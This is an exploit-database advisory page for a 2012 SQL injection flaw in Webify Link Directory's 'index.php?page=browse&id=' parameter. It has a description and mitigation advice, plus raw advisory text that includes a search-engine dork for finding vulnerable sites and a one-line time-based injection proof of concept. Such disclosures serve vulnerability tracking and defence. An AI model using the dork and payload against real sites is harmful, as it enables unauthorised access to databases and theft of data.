header-logo
Suggest Exploit
vendor:
Link Directory
by:
Daniel Godoy
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Link Directory
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2012

Webify Link Directory / SQL Injection

An SQL injection vulnerability exists in Webify Link Directory, which allows an attacker to execute arbitrary SQL commands on the underlying database. This can be exploited to manipulate data, disclose sensitive information, or gain access to the system. The vulnerability is due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'index.php' script when handling a 'page=browse' request. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable script.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered, and special characters should be escaped before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: Webify Link Directory / SQL Injection
# Date: 04/07/2012
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Sofware web: http://webify.ws/index.php?page=getapp&id=10
# Tested on: Linux
# Dork: allinurl: index.php?page=browse&id=1
#
# www.chap.cl
# Este Advisory fue descubierto por Daniel Godoy, integrante de
Project CHAP Security
# be secured / stay secure
# contacto@chap.cl

[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,
Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion, ksha, zerial,LinuxFer, Scorp
her0, r0dr1 y demas user de RemoteExecution
www.remoteexecution.info www.remoteexcution.com.ar
#RemoteExecution Hacking Group

[PoC]

http://localhost/index.php?page=browse&id=1' AND SLEEP(0) AND
'chap'='chap